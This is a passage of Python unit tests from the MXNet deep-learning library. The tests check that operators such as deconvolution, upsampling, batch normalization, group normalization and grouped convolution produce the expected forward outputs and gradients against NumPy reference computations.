exe_test = test._bind(default_device(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1, npout_grad1)
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test._bind(default_device(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_device())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_device())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv._bind(default_device(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0], rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv._bind(default_device(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_device())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_device())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv._bind(default_device(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_device())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv._bind(default_device(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1], deconv_args_grad[1], rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv._bind(default_device(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
@pytest.mark.serial
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
@pytest.mark.parametrize('shape,num_filter,num_group,kernel,pad', [
((1, 4, 15), 16, 2, (2,), (0,)),
((8, 4, 16), 16, 1, (3,), (1,)),
((1, 4, 15, 16), 16, 2, (2, 2), (0, 0)),
((8, 4, 16, 16), 16, 1, (3, 3), (1, 1)),
((1, 4, 3, 15, 16), 16, 2, (2, 2, 2), (0, 0, 0)),
((8, 4, 3, 16, 16), 16, 1, (3, 3, 3), (1, 1, 1))])
def test_deconvolution_forward_with_bias(shape, num_filter, num_group, kernel, pad):
"""Check if deconvolution forward can work well with bias=True
"""
if len(kernel) == 3 and mx.current_context().device_type == 'gpu':
pytest.skip('Skipping Conv3DTranspose tests for GPU')
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y_nb = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=True, pad=pad)
y_b = mx.sym.Deconvolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
exe_nb = y_nb._simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
exe_b = y_b._simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
data = np.random.uniform(-5, 5, size=exe_b.arg_arrays[0].shape)
weights = np.random.normal(size=exe_b.arg_arrays[1].shape)
bias = np.random.normal(size=exe_b.arg_arrays[2].shape)
def exe_forward(exe):
exe.arg_arrays[0][:] = data
exe.arg_arrays[1][:] = weights
if len(exe.arg_arrays) == 3:
exe.arg_arrays[2][:] = bias
return exe.forward(is_train=False)[0].asnumpy()
out_nb = exe_forward(exe_nb)
out_b = exe_forward(exe_b)
bias = np.broadcast_to(bias, [np.prod(out_nb.shape[2:])] + [num_filter]).T
bias = np.broadcast_to(bias.reshape((num_filter, *out_nb.shape[2:])), out_b.shape)
assert_almost_equal(out_nb + bias, out_b)
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_device()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up._bind(default_device(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
def _init_bilinear(arr, f):
weight = np.zeros(np.prod(arr.shape), dtype='float32')
shape = arr.shape
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(np.prod(shape)):
x = i % shape[3]
y = (i // shape[3]) % shape[2]
weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
arr[:] = weight.reshape(shape)
return arr
up = mx.sym.UpSampling(mx.sym.Variable("data"),
mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
num_filter=num_filter, num_args=2)
arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_device()),
'weight': mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
arr_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = up._bind(default_device(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(exe.outputs)
target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
assert out.shape == data_shape[:2] + target_shape
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
def test_bilinear_upsampling():
rootscale = [2,3]
scales = [1,2,3]
filters = [1,2,3]
bases = [1,2,3]
for params in itertools.product(rootscale, scales, filters, bases):
root_scale, scale, num_filter, base = params
# bilinear upsampling takes only 1 data and 1 weight
# multi input mode is not applicable
dimension = base*root_scale*scale
kernel = 2 * root_scale - root_scale % 2
data_shape = (1, num_filter, dimension, dimension)
weight_shape = (1, num_filter, kernel, kernel)
check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2), (2, 8, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
s = shape[1],
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
@xfail_when_nonstandard_decimal_separator
@pytest.mark.parametrize('op_name', ['BatchNorm', 'SyncBatchNorm'])
@pytest.mark.parametrize('shape', [(4, 2), (4, 3, 4),
(4, 6, 4, 5), (4, 5, 6, 4, 5)])
@pytest.mark.parametrize('fix_gamma', [False, True])
@pytest.mark.parametrize('cudnn_off', [False, True])
@pytest.mark.parametrize('output_mean_var', [False, True])
def test_batchnorm(op_name, shape, fix_gamma, cudnn_off, output_mean_var):
if op_name == 'BatchNorm':
op = mx.nd.BatchNorm
elif op_name == 'SyncBatchNorm':
op = mx.nd.contrib.SyncBatchNorm
else:
raise ValueError(f'Not supported {op_name}')
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req):
kwargs = dict(output_mean_var=output_mean_var)
if op_name == 'SyncBatchNorm':
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
if not fix_gamma:
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad(grad_req=gamma_grad_req)
else:
bn_gamma = mx.nd.ones(shape=(nch,))
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad(grad_req=beta_grad_req)
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
adX, adW, adb = 0, 0, 0
is_train = data_grad_req != 'null' or \
(not fix_gamma and gamma_grad_req != 'null') or \
beta_grad_req != 'null'
for _ in range(num_iters):
if data_grad_req != 'add':
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=fix_gamma, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
if is_train:
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
m = np.prod(shape) / shape[axis]
# cudnn uses m-1 in the denominator of its sample variance calculation, not m
sample_var_adjust = 1.0 if cudnn_off or fix_gamma else m / (m-1)
running_var = running_var * momentum + \
data_var_flat * sample_var_adjust * (1 - momentum)
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
adX = dX if data_grad_req != 'add' else adX + dX
adW = dW if gamma_grad_req != 'add' else adW + dW
adb = db if beta_grad_req != 'add' else adb + db
atol, rtol = 5e-2, 5e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
if is_train:
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
if data_grad_req != 'null':
assert_almost_equal(data.grad.asnumpy(),
adX.asnumpy(), atol=atol, rtol=rtol)
if not fix_gamma:
if gamma_grad_req != 'null':
assert_almost_equal(
bn_gamma.grad.asnumpy(), adW.asnumpy(),
atol=atol, rtol=rtol)
else:
assert((bn_gamma.asnumpy() == 1).all())
if beta_grad_req != 'null':
assert_almost_equal(
bn_beta.grad.asnumpy(), adb.asnumpy(), atol=atol, rtol=rtol)
grad_reqs = ['write'] if len(shape) != 4 else ['null', 'write', 'add']
for data_grad_req in grad_reqs:
for gamma_grad_req in grad_reqs:
if fix_gamma and gamma_grad_req != 'null':
continue
for beta_grad_req in grad_reqs:
for axis in range(len(shape)):
_test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req)
def test_groupnorm():
acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}
def x_hat_helper(x, num_groups, eps):
dtype = x.dtype
dshape = x.shape
assert len(dshape) == 4
acc_type = acc_types[str(dtype)]
new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
data = x.reshape(new_shape)
mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
return x_hat, mean, std
def np_groupnorm(data, gamma, beta, num_groups, eps):
new_param_shape = (1, dshape[1], 1, 1)
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
out = x_hat.reshape(dshape) * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
return out, mean, std
def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
new_shape = x_hat.shape
dshape = data.shape
dtype = data.dtype
new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
new_param_shape = (1, dshape[1], 1, 1)
acc_type = acc_types[str(dtype)]
ograd = ograd.reshape(new_shape)
data = data.reshape(new_shape)
gamma = gamma.reshape(new_param_shape)
beta = beta.reshape(new_param_shape)
mean = mean.reshape(new_moments_shape)
std = std.reshape(new_moments_shape)
beta_grad = np.sum(ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
gamma_grad = np.sum(x_hat * ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
x_hat_grad = ograd * gamma.reshape(1, num_groups, dshape[1] // num_groups, 1, 1)
ograd_mult = x_hat_grad / std
red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = ograd_mult - red_out
red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = data_grad - x_hat * red_out
return data_grad.reshape(dshape), gamma_grad, beta_grad
batch_size = random.randint(1, 8)
num_groups = random.randint(2, 3)
num_channels = random.randint(2, 3) * num_groups
height = random.randint(1, 5)
width = random.randint(1, 5)
dshape = (batch_size, num_channels, height, width)
param_shape = (num_channels,)
temp_shape = (batch_size, num_groups, int(num_channels / num_groups), height, width)
np_data = np.random.uniform(0.2, 1.0, dshape)
np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
np_beta = np.random.uniform(-1.0, 1.0, param_shape)
data_sym = mx.sym.Variable("data")
gamma_sym = mx.sym.Variable("gamma")
beta_sym = mx.sym.Variable("beta")
for dtype in [np.float16, np.float32, np.float64]:
eps = 1e-2 if dtype == np.float16 else 1e-5
mx_data = mx.nd.array(np_data, dtype=dtype)
mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
mx_beta = mx.nd.array(np_beta, dtype=dtype)
np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
num_groups=num_groups,
eps=eps)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=True)
check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-3 if dtype == np.float16 else 1e-4, dtype=dtype)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=False)
np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
np_mean, np_std,
num_groups, eps)
check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd, dtype=np_ograd.dtype)],
[np_data_grad, np_gamma_grad, np_beta_grad],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-2 if dtype == np.float16 else 1e-4, dtype=dtype)
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1._simple_bind(default_device(), x=shape)
exe2 = y2._simple_bind(default_device(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@pytest.mark.skip(reason="Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_device()
exe1 = y1._simple_bind(dev, x=shape)
exe2 = y2._simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
assert_allclose(arr1, arr2, rtol=1e-3, atol=1e-3)
def test_convolution_independent_gradients():
# NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
# GPU context will be enabled after figuring out the possible issue tracked at
# https://github.com/apache/incubator-mxnet/issues/15638.
ctx = mx.cpu()
atol = 1.0e-3
rtol = 1.0e-3
reqs = ["null", "write", "add"]
var_names = ["x", "w", "b"]
dims = [1, 2]
num_bases = [1, 8]
kernel_xs = [3, 5]
stride_xs = [1, 2]
pad_xs = [0, 1]
in_sizes = [7, 32]
no_biases = [True, False]
for dim, num_base, kernel_x, stride_x, pad_x , in_size, no_bias in \
itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
# Prepare params shape
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
x_shape = (2, num_base) + (in_size,) * dim
w_shape = (num_filter, num_base) + kernel
# Symbols definition
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b') if not no_bias else None
conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
for req_kind in reqs:
# Binding args for conv with possible dependent gradients
base_args = {
'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
args1 = copy.deepcopy(base_args)
grad1 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
